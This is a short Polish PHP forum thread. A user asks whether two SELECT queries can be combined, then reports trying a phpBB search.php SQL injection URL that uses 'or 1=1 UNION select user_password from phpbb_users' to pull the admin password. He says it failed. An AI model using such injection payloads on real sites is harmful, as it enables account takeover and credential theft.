Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> dziwne zapytanie
tamin
post
Post #1





Grupa: Zarejestrowani
Postów: 26
Pomógł: 0
Dołączył: 6.09.2003

Ostrzeżenie: (0%)
-----


Czy mozna zrobic zapytanie do sqla mniejwiecej takie:
SELECT cos FROM tabela_news WHERE id=$id [tutaj jakis znacznik] OR SELECT cos2 FROM tabela_arty WHERE id=$id;

Czy mozna dwa selecty w jednym zapytaniu dac a jezeli tak to jak je od siebie oddzielic.
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi
tamin
post
Post #2





Grupa: Zarejestrowani
Postów: 26
Pomógł: 0
Dołączył: 6.09.2003

Ostrzeżenie: (0%)
-----


mowisz ze sie da czyli musiales probowac i ci sie udalo.. Czy moze teoretycznie to sie da ale ty nie sprawdziales czy dziala? Bo ja sprawdzalem i moge powiedziec ze nie dziala:
http://yourdomain/yourforums/search.php?search_id=1 or 1=1 UNION
select
`user_password` from `phpbb_users` where user_id=1/*

Wiec chyba szumu tylko narobili z ta dziura bo i tak sie nie da nic z tym zrobic...
Go to the top of the page
+Quote Post

Posty w temacie


Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 5.10.2025 - 22:18